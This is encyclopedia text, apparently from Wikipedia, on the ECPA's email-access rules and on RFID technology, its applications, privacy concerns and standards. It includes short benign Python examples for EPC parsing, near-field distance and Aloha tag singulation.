Under ECPA, it is relatively easy for a government agency to demand that service providers hand over personal consumer data stored on the service provider's servers.[12] Email that is stored on a third party's server for more than 180 days is considered by the law to be abandoned. All that is required for a law enforcement agency to obtain the content of the emails is a written statement certifying that the information is relevant to an investigation, without judicial review.[13] When the law was initially passed, emails were stored on a third party's server for only a short period of time, just long enough to facilitate transfer of email to the consumer's email client, which was generally located on their personal or work computer. Now, with online email services such as Gmail and Hotmail prevalent, users are more likely to store emails online indefinitely, rather than to keep them for less than 180 days.[14] If the same emails were stored on the user's personal computer, the police would have to obtain a warrant first for seizure of their contents, regardless of their age. When they are stored on an internet server, however, no warrant is needed under the law, starting 180 days after receipt of the message. In 2013, members of the U.S. Congress proposed to reform this procedure.[15]
ECPA also increased the list of crimes that can justify the use of surveillance, as well as the number of judicial members who can authorize such surveillance. Data can be obtained on traffic and calling patterns of an individual or a group without a warrant, allowing an agency to gain valuable intelligence and possibly invade privacy without any scrutiny, because the actual content of the communication is left untouched. While workplace communications are, in theory, protected, all that is needed to gain access to communications is for an employer to simply give notice, or for a supervisor to report that the employee's actions are not in the company's interest. This means that, with minimal assumptions, an employer can monitor communications within the company. The ongoing debate is where to limit the government's power to see into civilian lives while balancing the need to curb national threats.[citation needed][16]
In 2011, The New York Times published "1986 Privacy Law Is Outrun by the Web", highlighting that:[17]
...the Justice Department argued in court that cellphone users had given up the expectation of privacy about their location by voluntarily giving that information to carriers. In April, it argued in a federal court in Colorado that it ought to have access to some e-mails without a search warrant. And federal law enforcement officials, citing technology advances, plan to ask for new regulations that would smooth their ability to perform legal wiretaps of various Internet communications.
The analysis went on to discuss how Google, Facebook, Verizon, Twitter and other companies are in the middle between users and governments.
|
https://en.wikipedia.org/wiki/Electronic_Communications_Privacy_Act
|
Radio-frequency identification (RFID) uses electromagnetic fields to automatically identify and track tags attached to objects. An RFID system consists of a tiny radio transponder called a tag, a radio receiver, and a transmitter. When triggered by an electromagnetic interrogation pulse from a nearby RFID reader device, the tag transmits digital data, usually an identifying inventory number, back to the reader. This number can be used to track inventory goods.[1]
Passive tags are powered by energy from the RFID reader's interrogating radio waves. Active tags are powered by a battery and thus can be read at a greater range from the RFID reader, up to hundreds of meters.
Unlike a barcode, the tag does not need to be within the line of sight of the reader, so it may be embedded in the tracked object. RFID is one method of automatic identification and data capture (AIDC).[2]
RFID tags are used in many industries. For example, an RFID tag attached to an automobile during production can be used to track its progress through the assembly line,[citation needed] RFID-tagged pharmaceuticals can be tracked through warehouses,[citation needed] and implanting RFID microchips in livestock and pets enables positive identification of animals.[3] Tags can also be used in shops to expedite checkout, and to prevent theft by customers and employees.[4]
Since RFID tags can be attached to physical money, clothing, and possessions, or implanted in animals and people, the possibility of reading personally linked information without consent has raised serious privacy concerns.[5] These concerns resulted in standard specifications development addressing privacy and security issues.
In 2014, the world RFID market was worth US$8.89 billion, up from US$7.77 billion in 2013 and US$6.96 billion in 2012. This figure includes tags, readers, and software/services for RFID cards, labels, fobs, and all other form factors. The market value is expected to rise from US$12.08 billion in 2020 to US$16.23 billion by 2029.[6]
In 1945, Leon Theremin invented the "Thing", a listening device for the Soviet Union which retransmitted incident radio waves with added audio information. Sound waves vibrated a diaphragm which slightly altered the shape of the resonator, which modulated the reflected radio frequency. Even though this device was a covert listening device, rather than an identification tag, it is considered to be a predecessor of RFID because it was passive, being energised and activated by waves from an outside source.[7]
Similar technology, such as the Identification friend or foe transponder, was routinely used by the Allies and Germany in World War II to identify aircraft as friendly or hostile. Transponders are still used by most powered aircraft.[8] An early work exploring RFID is the landmark 1948 paper by Harry Stockman,[9] who predicted that "Considerable research and development work has to be done before the remaining basic problems in reflected-power communication are solved, and before the field of useful applications is explored."
Mario Cardullo's device, patented on January 23, 1973, was the first true ancestor of modern RFID,[10] as it was a passive radio transponder with memory.[11] The initial device was passive, powered by the interrogating signal, and was demonstrated in 1971 to the New York Port Authority and other potential users. It consisted of a transponder with 16-bit memory for use as a toll device. The basic Cardullo patent covers the use of radio frequency (RF), sound and light as transmission carriers. The original business plan presented to investors in 1969 showed uses in transportation (automotive vehicle identification, automatic toll system, electronic license plate, electronic manifest, vehicle routing, vehicle performance monitoring), banking (electronic chequebook, electronic credit card), security (personnel identification, automatic gates, surveillance) and medical (identification, patient history).[10]
In 1973, an early demonstration of reflected power (modulated backscatter) RFID tags, both passive and semi-passive, was performed by Steven Depp, Alfred Koelle and Robert Freyman at the Los Alamos National Laboratory.[12] The portable system operated at 915 MHz and used 12-bit tags. This technique is used by the majority of today's UHFID and microwave RFID tags.[13]
In 1983, the first patent to be associated with the abbreviation RFID was granted to Charles Walton.[14]
In 1996, the first patent for a batteryless RFID passive tag with limited interference was granted to David Everett, John Frech, Theodore Wright, and Kelly Rodriguez.[15]
A radio-frequency identification system uses tags, or labels, attached to the objects to be identified. Two-way radio transmitter-receivers called interrogators or readers send a signal to the tag and read its response.[16]
RFID tags are made up of three parts:
The tag information is stored in non-volatile memory.[17] The RFID tag includes either fixed or programmable logic for processing the transmission and sensor data.[citation needed]
RFID tags can be passive, active, or battery-assisted passive. An active tag has an on-board battery and periodically transmits its ID signal.[17] A battery-assisted passive tag has a small battery on board and is activated when in the presence of an RFID reader. A passive tag is cheaper and smaller because it has no battery; instead, the tag uses the radio energy transmitted by the reader. However, to operate, a passive tag must be illuminated with a power level roughly a thousand times stronger than an active tag requires for signal transmission.[18]
Tags may either be read-only, having a factory-assigned serial number that is used as a key into a database, or may be read/write, where object-specific data can be written into the tag by the system user. Field programmable tags may be write-once, read-multiple; "blank" tags may be written with an electronic product code by the user.[19]
The RFID tag receives the message and then responds with its identification and other information. This may be only a unique tag serial number, or may be product-related information such as a stock number, lot or batch number, production date, or other specific information. Since tags have individual serial numbers, the RFID system design can discriminate among several tags that might be within the range of the RFID reader and read them simultaneously.
RFID systems can be classified by the type of tag and reader. There are three types:[20]
Fixed readers are set up to create a specific interrogation zone which can be tightly controlled. This allows a highly defined reading area for when tags go in and out of the interrogation zone. Mobile readers may be handheld or mounted on carts or vehicles.
Signaling between the reader and the tag is done in several different incompatible ways, depending on the frequency band used by the tag. Tags operating on the LF and HF bands are, in terms of radio wavelength, very close to the reader antenna because they are only a small percentage of a wavelength away. In this near field region, the tag is closely coupled electrically with the transmitter in the reader. The tag can modulate the field produced by the reader by changing the electrical loading the tag represents. By switching between lower and higher relative loads, the tag produces a change that the reader can detect. At UHF and higher frequencies, the tag is more than one radio wavelength away from the reader, requiring a different approach. The tag can backscatter a signal. Active tags may contain functionally separated transmitters and receivers, and the tag need not respond on a frequency related to the reader's interrogation signal.[27]
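The near-/far-field distinction above can be made concrete with a quick calculation: the conventional near-field boundary is roughly λ/2π, where λ = c/f. A short sketch (the band frequencies are the common RFID bands; the λ/2π boundary is the usual rule of thumb, not a sharp physical limit):

```python
from math import pi

C = 299_792_458  # speed of light in m/s

def near_field_boundary_m(freq_hz: float) -> float:
    """Conventional near-field boundary, lambda / (2*pi), in metres."""
    wavelength = C / freq_hz
    return wavelength / (2 * pi)

# Common RFID bands:
for name, f in [("LF 125 kHz", 125e3),
                ("HF 13.56 MHz", 13.56e6),
                ("UHF 915 MHz", 915e6)]:
    print(f"{name}: near-field boundary ~ {near_field_boundary_m(f):.3g} m")
```

At 915 MHz the boundary comes out to only about 5 cm, which is consistent with the text: UHF tags at typical read distances sit in the far field and must backscatter, while LF and HF tags at centimetre ranges are deep inside the near field and couple inductively.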
An Electronic Product Code (EPC) is one common type of data stored in a tag. When written into the tag by an RFID printer, the tag contains a 96-bit string of data. The first eight bits are a header which identifies the version of the protocol. The next 28 bits identify the organization that manages the data for this tag; the organization number is assigned by the EPCGlobal consortium. The next 24 bits are an object class, identifying the kind of product. The last 36 bits are a unique serial number for a particular tag. These last two fields are set by the organization that issued the tag. Rather like a URL, the total electronic product code number can be used as a key into a global database to uniquely identify a particular product.[28]
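The 96-bit layout described above (8-bit header, 28-bit manager number, 24-bit object class, 36-bit serial) can be unpacked with simple bit arithmetic. A sketch (the field names and sample values are illustrative, not from any EPC standard document):

```python
def parse_epc96(epc: int) -> dict:
    """Split a 96-bit EPC into the four fields described above."""
    assert 0 <= epc < 1 << 96, "EPC must fit in 96 bits"
    return {
        "header":       (epc >> 88) & 0xFF,        # top 8 bits
        "manager":      (epc >> 60) & 0xFFFFFFF,   # next 28 bits
        "object_class": (epc >> 36) & 0xFFFFFF,    # next 24 bits
        "serial":       epc & 0xFFFFFFFFF,         # bottom 36 bits
    }

# Round-trip example with arbitrary field values:
epc = (0x30 << 88) | (12345 << 60) | (678 << 36) | 987654321
assert parse_epc96(epc) == {"header": 0x30, "manager": 12345,
                            "object_class": 678, "serial": 987654321}
```

The four masks and shifts mirror the sizes given in the text: 8 + 28 + 24 + 36 = 96 bits in total.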
Often more than one tag will respond to a tag reader. For example, many individual products with tags may be shipped in a common box or on a common pallet. Collision detection is important to allow reading of data. Two different types of protocols are used to "singulate" a particular tag, allowing its data to be read in the midst of many similar tags. In a slotted Aloha system, the reader broadcasts an initialization command and a parameter that the tags individually use to pseudo-randomly delay their responses. When using an "adaptive binary tree" protocol, the reader sends an initialization symbol and then transmits one bit of ID data at a time; only tags with matching bits respond, and eventually only one tag matches the complete ID string.[29]
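The slotted-Aloha approach can be illustrated with a toy simulation: in each round every unread tag picks a random slot, a slot chosen by exactly one tag yields a successful read, and collided tags retry in the next round. This is a simplified model of the idea, not an implementation of any specific air-interface standard:

```python
import random

def singulate_aloha(tag_ids, num_slots=8, seed=42):
    """Toy slotted-Aloha singulation: repeat rounds until all tags read."""
    rng = random.Random(seed)
    unread, reads, rounds = set(tag_ids), [], 0
    while unread:
        rounds += 1
        slots = {}
        for tag in unread:                    # each tag picks a random slot
            slots.setdefault(rng.randrange(num_slots), []).append(tag)
        for occupants in slots.values():
            if len(occupants) == 1:           # no collision: tag is read
                reads.append(occupants[0])
                unread.discard(occupants[0])
    return reads, rounds

reads, rounds = singulate_aloha(range(20))
assert sorted(reads) == list(range(20))       # every tag eventually read
```

As the text notes, both real schemes degrade with many tags: here, more tags per slot means more collisions and more rounds before every tag is singulated.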
Both methods have drawbacks when used with many tags or with multiple overlapping readers.[citation needed]
"Bulk reading" is a strategy for interrogating multiple tags at the same time, but lacks sufficient precision for inventory control. A group of objects, all of them RFID tagged, are read completely from one single reader position at one time. However, as tags respond strictly sequentially, the time needed for bulk reading grows linearly with the number of labels to be read. This means it takes at least twice as long to read twice as many labels. Due to collision effects, the time required is greater.[30]
A group of tags has to be illuminated by the interrogating signal just like a single tag. This is not a challenge concerning energy, but with respect to visibility; if any of the tags are shielded by other tags, they might not be sufficiently illuminated to return a sufficient response. The response conditions for inductively coupled HF RFID tags and coil antennas in magnetic fields appear better than for UHF or SHF dipole fields, but then distance limits apply and may prevent success.[citation needed][31]
Under operational conditions, bulk reading is not reliable. Bulk reading can be a rough guide for logistics decisions, but due to a high proportion of reading failures, it is not (yet)[when?] suitable for inventory management. However, when a single RFID tag might be seen as not guaranteeing a proper read, multiple RFID tags, where at least one will respond, may be a safer approach for detecting a known grouping of objects. In this respect, bulk reading is a fuzzy method for process support. From the perspective of cost and effect, bulk reading is not reported as an economical approach to secure process control in logistics.[32]
RFID tags are easy to conceal or incorporate in other items. For example, in 2009 researchers at Bristol University successfully glued RFID micro-transponders to live ants in order to study their behavior.[33] This trend towards increasingly miniaturized RFIDs is likely to continue as technology advances.
Hitachi holds the record for the smallest RFID chip, at 0.05 mm × 0.05 mm. This is 1/64th the size of the previous record holder, the mu-chip.[34] Manufacture is enabled by using the silicon-on-insulator (SOI) process. These dust-sized chips can store 38-digit numbers using 128-bit read-only memory (ROM).[35] A major challenge is the attachment of antennas, which limits read range to only millimeters.
In early 2020, MIT researchers demonstrated a terahertz frequency identification (TFID) tag that is barely 1 square millimeter in size. The devices are essentially inexpensive, small pieces of silicon that function like larger RFID tags. Because of the small size, manufacturers could tag any product and track logistics information for minimal cost.[36][37]
An RFID tag can be affixed to an object and used to track tools, equipment, inventory, assets, people, or other objects.
RFID offers advantages over manual systems or the use of barcodes. The tag can be read if passed near a reader, even if it is covered by the object or not visible. The tag can be read inside a case, carton, box or other container, and unlike barcodes, RFID tags can be read hundreds at a time; barcodes can only be read one at a time using current devices. Some RFID tags, such as battery-assisted passive tags, are also able to monitor temperature and humidity.[38]
In 2011, the cost of passive tags started at US$0.09 each; special tags, meant to be mounted on metal or withstand gamma sterilization, could cost up to US$5. Active tags for tracking containers, medical assets, or monitoring environmental conditions in data centers started at US$50 and could be over US$100 each.[39]Battery-Assisted Passive (BAP) tags were in the US$3–10 range.[citation needed]
RFID can be used in a variety of applications,[40][41] such as:
In 2010, three factors drove a significant increase in RFID usage: decreased cost of equipment and tags, increased performance to a reliability of 99.9%, and a stable international standard around HF and UHF passive RFID. The adoption of these standards was driven by EPCglobal, a joint venture between GS1 and GS1 US, which were responsible for driving global adoption of the barcode in the 1970s and 1980s. The EPCglobal Network was developed by the Auto-ID Center.[45]
RFID provides a way for organizations to identify and manage stock, tools and equipment (asset tracking), etc. without manual data entry. Manufactured products such as automobiles or garments can be tracked through the factory and through shipping to the customer. Automatic identification with RFID can be used for inventory systems. Many organisations require that their vendors place RFID tags on all shipments to improve supply chain management.[citation needed] Warehouse management systems[clarification needed] incorporate this technology to speed up the receiving and delivery of products and reduce the cost of labor needed in warehouses.[46]
RFID is used for item-level tagging in retail stores. This can enable more accurate and lower-labor-cost supply chain and store inventory tracking, as is done at Lululemon, though physically locating items in stores requires more expensive technology.[47] RFID tags can be used at checkout; for example, at some stores of the French retailer Decathlon, customers perform self-checkout by either using a smartphone or putting items into a bin near the register that scans the tags without having to orient each one toward the scanner.[47] Some stores use RFID-tagged items to trigger systems that provide customers with more information or suggestions, such as fitting rooms at Chanel and the "Color Bar" at Kendra Scott stores.[47]
Item tagging can also provide protection against theft by customers and employees by using electronic article surveillance (EAS). Tags of different types can be physically removed with a special tool or deactivated electronically when payment is made.[48] On leaving the shop, customers have to pass near an RFID detector; if they have items with active RFID tags, an alarm sounds, both indicating an unpaid-for item and identifying what it is.
Casinos can use RFID to authenticate poker chips, and can selectively invalidate any chips known to be stolen.[49]
RFID tags are widely used in identification badges, replacing earlier magnetic stripe cards. These badges need only be held within a certain distance of the reader to authenticate the holder. Tags can also be placed on vehicles, which can be read at a distance, to allow entrance to controlled areas without having to stop the vehicle and present a card or enter an access code.[citation needed]
In 2010, Vail Resorts began using UHF Passive RFID tags in ski passes.[50]
Facebook is using RFID cards at most of their live events to allow guests to automatically capture and post photos.[citation needed][when?]
Automotive brands have adopted RFID for social media product placement more quickly than other industries. Mercedes was an early adopter in 2011 at the PGA Golf Championships,[51] and by the 2013 Geneva Motor Show many of the larger brands were using RFID for social media marketing.[52][further explanation needed]
To prevent retailers from diverting products, manufacturers are exploring the use of RFID tags on promoted merchandise so that they can track exactly which products have sold through the supply chain at fully discounted prices.[53][when?]
Yard management, shipping, freight and distribution centers use RFID tracking. In the railroad industry, RFID tags mounted on locomotives and rolling stock identify the owner, identification number and type of equipment and its characteristics. This can be used with a database to identify the type, origin, destination, etc. of the commodities being carried.[54]
In commercial aviation, RFID is used to support maintenance on commercial aircraft. RFID tags are used to identify baggage and cargo at several airports and airlines.[55][56]
Some countries are using RFID for vehicle registration and enforcement.[57]RFID can help detect and retrieve stolen cars.[58][59]
RFID is used in intelligent transportation systems. In New York City, RFID readers are deployed at intersections to track E-ZPass tags as a means of monitoring traffic flow. The data is fed through the broadband wireless infrastructure to the traffic management center to be used in adaptive traffic control of the traffic lights.[60]
Where ship, rail, or highway tanks are being loaded, a fixed RFID antenna contained in a transfer hose can read an RFID tag affixed to the tank, positively identifying it.[61]
At least one company has introduced RFID to identify and locate underground infrastructure assets such as gas pipelines, sewer lines, electrical cables, communication cables, etc.[62]
The first RFID passports ("e-passports") were issued by Malaysia in 1998. In addition to information also contained on the visual data page of the passport, Malaysian e-passports record the travel history (time, date, and place) of entry into and exit out of the country.[citation needed]
Other countries that insert RFID in passports include Norway (2005),[63] Japan (March 1, 2006), most EU countries (around 2006), Singapore (2006), Australia, Hong Kong, the United States (2007), the United Kingdom and Northern Ireland (2006), India (June 2008), Serbia (July 2008), Republic of Korea (August 2008), Taiwan (December 2008), Albania (January 2009), The Philippines (August 2009), Republic of Macedonia (2010), Argentina (2012), Canada (2013), Uruguay (2015)[64] and Israel (2017).
Standards for RFID passports are determined by the International Civil Aviation Organization (ICAO), and are contained in ICAO Document 9303, Part 1, Volumes 1 and 2 (6th edition, 2006). ICAO refers to the ISO/IEC 14443 RFID chips in e-passports as "contactless integrated circuits". ICAO standards provide for e-passports to be identifiable by a standard e-passport logo on the front cover.
Since 2006, RFID tags included in new United States passports store the same information that is printed within the passport, and include a digital picture of the owner.[65] The United States Department of State initially stated the chips could only be read from a distance of 10 centimetres (3.9 in), but after widespread criticism and a clear demonstration that special equipment can read the test passports from 10 metres (33 ft) away,[66] the passports were designed to incorporate a thin metal lining to make it more difficult for unauthorized readers to skim information when the passport is closed. The department will also implement Basic Access Control (BAC), which functions as a personal identification number (PIN) in the form of characters printed on the passport data page. Before a passport's tag can be read, this PIN must be entered into an RFID reader. The BAC also enables the encryption of any communication between the chip and interrogator.[67]
In many countries, RFID tags can be used to pay for mass transit fares on bus, trains, or subways, or to collect tolls on highways.
Some bike lockers are operated with RFID cards assigned to individual users. A prepaid card is required to open or enter a facility or locker and is used to track and charge based on how long the bike is parked.[citation needed]
The Zipcar car-sharing service uses RFID cards for locking and unlocking cars and for member identification.[68]
In Singapore, RFID replaces paper Season Parking Ticket (SPT).[69]
RFID tags for animals represent one of the oldest uses of RFID. Originally meant for large ranches and rough terrain, since the outbreak of mad-cow disease, RFID has become crucial in animal identification management. An implantable RFID tag or transponder can also be used for animal identification. The transponders are better known as PIT (Passive Integrated Transponder) tags, passive RFID, or "chips" on animals.[70] The Canadian Cattle Identification Agency began using RFID tags as a replacement for barcode tags. Currently, CCIA tags are used in Wisconsin and by United States farmers on a voluntary basis. The USDA is currently developing its own program.
RFID tags are required for all cattle sold in Australia and in some states, sheep and goats as well.[71]
Biocompatible microchip implants that use RFID technology are being routinely implanted in humans. The first human to receive an RFID microchip implant was American artist Eduardo Kac in 1997.[72][73] Kac implanted the microchip live on television (and also live on the Internet) in the context of his artwork Time Capsule.[74] A year later, British professor of cybernetics Kevin Warwick had an RFID chip implanted in his arm by his general practitioner, George Boulos.[75][76] In 2004, the 'Baja Beach Club' operated by Conrad Chase in Barcelona[77] and Rotterdam offered implanted chips to identify their VIP customers, who could in turn use them to pay for service. In 2009, British scientist Mark Gasson had an advanced glass capsule RFID device surgically implanted into his left hand and subsequently demonstrated how a computer virus could wirelessly infect his implant and then be transmitted on to other systems.[78]
The Food and Drug Administration in the United States approved the use of RFID chips in humans in 2004.[79]
There is controversy regarding human applications of implantable RFID technology, including concerns that individuals could potentially be tracked by carrying an identifier unique to them. Privacy advocates have protested against implantable RFID chips, warning of potential abuse. Some are concerned this could lead to abuse by an authoritarian government, to removal of freedoms,[80] and to the emergence of an "ultimate panopticon", a society where all citizens behave in a socially accepted manner because others might be watching.[81]
On July 22, 2006, Reuters reported that two hackers, Newitz and Westhues, at a conference in New York City demonstrated that they could clone the RFID signal from a human implanted RFID chip, indicating that the device was not as secure as was previously claimed.[82]
The UFO religion Universe People is notorious online for their vocal opposition to human RFID chipping, which they claim is a saurian attempt to enslave the human race; one of their web domains is "dont-get-chipped".[83][84][85]
Adoption of RFID in the medical industry has been widespread and very effective.[86] Hospitals are among the first users to combine both active and passive RFID.[87] Active tags track high-value or frequently moved items, and passive tags track smaller, lower-cost items that only need room-level identification.[88] Medical facility rooms can collect data from transmissions of RFID badges worn by patients and employees, as well as from tags assigned to items such as mobile medical devices.[89] The U.S. Department of Veterans Affairs (VA) recently announced plans to deploy RFID in hospitals across America to improve care and reduce costs.[90]
Since 2004, a number of U.S. hospitals have begun implanting patients with RFID tags and using RFID systems; the systems are typically used for workflow and inventory management.[91][92][93] The use of RFID to prevent mix-ups between sperm and ova in IVF clinics is also being considered.[94]
In October 2004, the FDA approved the USA's first RFID chips that can be implanted in humans. The 134 kHz RFID chips, from VeriChip Corp., can incorporate personal medical information and could save lives and limit injuries from errors in medical treatments, according to the company. Anti-RFID activists Katherine Albrecht and Liz McIntyre discovered an FDA Warning Letter that spelled out health risks.[95] According to the FDA, these include "adverse tissue reaction", "migration of the implanted transponder", "failure of implanted transponder", "electrical hazards" and "magnetic resonance imaging [MRI] incompatibility."
Libraries have used RFID to replace the barcodes on library items. The tag can contain identifying information or may just be a key into a database. An RFID system may replace or supplement bar codes and may offer another method of inventory management and self-service checkout by patrons. It can also act as a security device, taking the place of the more traditional electromagnetic security strip.[96]
It is estimated that over 30 million library items worldwide now contain RFID tags, including some in the Vatican Library in Rome.[97]
Since RFID tags can be read through an item, there is no need to open a book cover or DVD case to scan an item, and a stack of books can be read simultaneously. Book tags can be read while books are in motion on a conveyor belt, which reduces staff time. This can all be done by the borrowers themselves, reducing the need for library staff assistance. With portable readers, inventories could be done on a whole shelf of materials within seconds.[98] However, as of 2008, this technology remained too costly for many smaller libraries, and the conversion period has been estimated at 11 months for an average-size library. A 2004 Dutch estimate was that a library which lends 100,000 books per year should plan on a cost of €50,000 (borrow- and return-stations: €12,500 each; detection porches: €10,000 each; tags: €0.36 each). RFID taking a large burden off staff could also mean that fewer staff will be needed, resulting in some of them getting laid off,[97] but that has so far not happened in North America, where recent surveys have not returned a single library that cut staff because of adding RFID.[99] In fact, library budgets are being reduced for personnel and increased for infrastructure, making it necessary for libraries to add automation to compensate for the reduced staff size.[99] Also, the tasks that RFID takes over are largely not the primary tasks of librarians.[99] A finding in the Netherlands is that borrowers are pleased with the fact that staff are now more available for answering questions.[99]
Privacy concerns have been raised surrounding library use of RFID.[100][101]Because some RFID tags can be read up to 100 metres (330 ft) away, there is some concern over whether sensitive information could be collected from an unwilling source. However, library RFID tags do not contain any patron information,[102]and the tags used in the majority of libraries use a frequency only readable from approximately 10 feet (3.0 m).[96]Another concern is that a non-library agency could potentially record the RFID tags of every person leaving the library without the library administrator's knowledge or consent. One simple option is to let the book transmit a code that has meaning only in conjunction with the library's database. Another possible enhancement would be to give each book a new code every time it is returned. In future, should readers become ubiquitous (and possibly networked), then stolen books could be traced even outside the library. Tag removal could be made difficult if the tags are so small that they fit invisibly inside a (random) page, possibly put there by the publisher.[citation needed]
RFID technologies are now[when?] also implemented in end-user applications in museums.[103] An example was the custom-designed temporary research application, "eXspot", at the Exploratorium, a science museum in San Francisco, California. A visitor entering the museum received an RF tag that could be carried as a card. The eXspot system enabled the visitor to receive information about specific exhibits. Aside from the exhibit information, the visitor could take photographs of themselves at the exhibit. It was also intended to allow the visitor to take data for later analysis. The collected information could be retrieved at home from a "personalized" website keyed to the RFID tag.[104]
In 2004, school authorities in the Japanese city of Osaka made a decision to start chipping children's clothing, backpacks, and student IDs in a primary school.[105] Later, in 2007, a school in Doncaster, England, piloted a monitoring system designed to keep tabs on pupils by tracking radio chips in their uniforms.[106][when?] St Charles Sixth Form College in west London, England, starting in 2008, uses an RFID card system to check in and out of the main gate, to both track attendance and prevent unauthorized entrance. Similarly, Whitcliffe Mount School in Cleckheaton, England, uses RFID to track pupils and staff in and out of the building via a specially designed card. In the Philippines, during 2012, some schools already[when?] use RFID in IDs for borrowing books.[107][unreliable source?] Gates in those particular schools also have RFID scanners for buying items at school shops and canteens. RFID is also used in school libraries, and to sign in and out for student and teacher attendance.[99]
RFID for timing races began in the early 1990s with pigeon racing, introduced by the company Deister Electronics in Germany. RFID can provide race start and end timings for individuals in large races, where it is impossible to get accurate stopwatch readings for every entrant.[citation needed]
In races using RFID, racers wear tags that are read by antennas placed alongside the track or on mats across the track. UHF tags provide accurate readings with specially designed antennas. Rush error,[clarification needed]lap count errors and accidents at race start are avoided, as anyone can start and finish at any time without being in a batch mode.[clarification needed]
The design of the chip and of the antenna controls the range from which it can be read. Short-range compact chips are twist-tied to the shoe or strapped to the ankle with hook-and-loop fasteners. The chips must be about 400 mm from the mat, therefore giving very good temporal resolution. Alternatively, a chip plus a very large (125 mm square) antenna can be incorporated into the bib number worn on the athlete's chest at a height of about 1.25 m (4.1 ft).[citation needed]
Passive and active RFID systems are used in off-road events such as Orienteering, Enduro and Hare and Hounds racing. Riders have a transponder on their person, normally on their arm. When they complete a lap they swipe or touch the receiver, which is connected to a computer, to log their lap time.[citation needed]
RFID is being[when?] adopted by many recruitment agencies which have a PET (physical endurance test) as their qualifying procedure, especially in cases where the candidate volumes may run into millions (Indian Railway recruitment cells, police and power sector).
A number of ski resorts have adopted RFID tags to provide skiers hands-free access to ski lifts. Skiers do not have to take their passes out of their pockets. Ski jackets have a left pocket into which the chip+card fits. This nearly contacts the sensor unit on the left of the turnstile as the skier pushes through to the lift. These systems were based on high frequency (HF) at 13.56 MHz. The bulk of ski areas in Europe, from Verbier to Chamonix, use these systems.[108][109][110]
The NFL in the United States equips players with RFID chips that measure speed, distance and direction traveled by each player in real time. Currently, cameras stay focused on the quarterback; however, numerous plays are happening simultaneously on the field. The RFID chip will provide new insight into these simultaneous plays.[111] The chip triangulates the player's position within six inches and will be used to digitally broadcast replays. The RFID chip will make individual player information accessible to the public. The data will be available via the NFL 2015 app.[112] The RFID chips are manufactured by Zebra Technologies, which tested the chip in 18 stadiums last year[when?] to track vector data.[113]
RFID tags are often a complement, but not a substitute, for Universal Product Code (UPC) or European Article Number (EAN) barcodes. They may never completely replace barcodes, due in part to their higher cost and the advantage of multiple data sources on the same object. Also, unlike RFID labels, barcodes can be generated and distributed electronically by e-mail or mobile phone, for printing or display by the recipient; an example is airline boarding passes. The new EPC, along with several other schemes, is widely available at reasonable cost.
The storage of data associated with tracking items will require many terabytes. Filtering and categorizing RFID data is needed to create useful information. It is likely that goods will be tracked by the pallet using RFID tags, and at the package level with UPC or EAN from unique barcodes.
A unique identity is a mandatory requirement for RFID tags, regardless of the particular numbering scheme chosen. RFID tag data capacity is large enough that each individual tag can have a unique code, while current barcodes are limited to a single type code for a particular product. The uniqueness of RFID tags means that a product may be tracked as it moves from location to location while being delivered to a person. This may help to combat theft and other forms of product loss. The tracing of products is an important feature that is well supported with RFID tags containing a unique identity of the tag and the serial number of the object. This may help companies cope with quality deficiencies and resulting recall campaigns, but it also contributes to concern about the tracking and profiling of persons after the sale.
Since around 2007, there has been increasing development in the use of RFID[when?] in the waste management industry. RFID tags are installed on waste collection carts, linking carts to the owner's account for easy billing and service verification.[114] The tag is embedded into a garbage or recycling container, and the RFID reader is affixed to the garbage and recycling trucks.[115] RFID also measures a customer's set-out rate and provides insight as to the number of carts serviced by each waste collection vehicle. This RFID process replaces traditional "pay as you throw" (PAYT) municipal solid waste usage-pricing models.
Active RFID tags have the potential to function as low-cost remote sensors that broadcast telemetry back to a base station. Applications of tagometry data could include sensing of road conditions by implanted beacons, weather reports, and noise level monitoring.[116]
Passive RFID tags can also report sensor data. For example, the Wireless Identification and Sensing Platform is a passive tag that reports temperature, acceleration and capacitance to commercial Gen2 RFID readers.
It is possible that active or battery-assisted passive (BAP) RFID tags could broadcast a signal to an in-store receiver to determine whether the RFID tag – and by extension, the product it is attached to – is in the store.[citation needed]
To avoid injuries to humans and animals, RF transmission needs to be controlled.[117] A number of organizations have set standards for RFID, including the International Organization for Standardization (ISO), the International Electrotechnical Commission (IEC), ASTM International, the DASH7 Alliance and EPCglobal.[118]
Several specific industries have also set guidelines, including the Financial Services Technology Consortium (FSTC) for tracking IT assets with RFID, the Computing Technology Industry Association (CompTIA) for certifying RFID engineers, and the International Air Transport Association (IATA) for luggage in airports.[citation needed]
Every country can set its own rules for frequency allocation for RFID tags, and not all radio bands are available in all countries. These frequencies are known as the ISM bands (Industrial, Scientific and Medical bands). The return signal of the tag may still cause interference for other radio users.[citation needed]
In North America, UHF can be used unlicensed for 902–928 MHz (±13 MHz from the 915 MHz center frequency), but restrictions exist for transmission power.[citation needed] In Europe, RFID and other low-power radio applications are regulated by ETSI recommendations EN 300 220 and EN 302 208, and ERO recommendation 70 03, allowing RFID operation with somewhat complex band restrictions from 865–868 MHz.[citation needed] Readers are required to monitor a channel before transmitting ("Listen Before Talk"); this requirement has led to some restrictions on performance, the resolution of which is a subject of current[when?] research. The North American UHF standard is not accepted in France, as it interferes with its military bands.[citation needed] On July 25, 2012, Japan changed its UHF band to 920 MHz, more closely matching the United States' 915 MHz band, establishing an international standard environment for RFID.[citation needed]
In some countries, a site license is needed, which needs to be applied for at the local authorities, and can be revoked.[citation needed]
As of 31 October 2014, regulations are in place in 78 countries representing approximately 96.5% of the world's GDP, and work on regulations was in progress in three countries representing approximately 1% of the world's GDP.[119]
Standards that have been made regarding RFID include:
In order to ensure global interoperability of products, several organizations have set up additional standards for RFID testing. These standards include conformance, performance and interoperability tests.[citation needed]
EPC Gen2 is short for EPCglobal UHF Class 1 Generation 2.
EPCglobal, a joint venture between GS1 and GS1 US, is working on international standards for the use of mostly passive RFID and the Electronic Product Code (EPC) in the identification of many items in the supply chain for companies worldwide.
One of the missions of EPCglobal was to simplify the Babel of protocols prevalent in the RFID world in the 1990s. Two tag air interfaces (the protocol for exchanging information between a tag and a reader) were defined (but not ratified) by EPCglobal prior to 2003. These protocols, commonly known as Class 0 and Class 1, saw significant commercial implementation in 2002–2005.[121]
In 2004, the Hardware Action Group created a new protocol, the Class 1 Generation 2 interface, which addressed a number of problems that had been experienced with Class 0 and Class 1 tags. The EPC Gen2 standard was approved in December 2004, after a contention from Intermec that the standard might infringe a number of their RFID-related patents. It was decided that the standard itself does not infringe their patents, making the standard royalty-free.[122] The EPC Gen2 standard was adopted with minor modifications as ISO 18000-6C in 2006.[123]
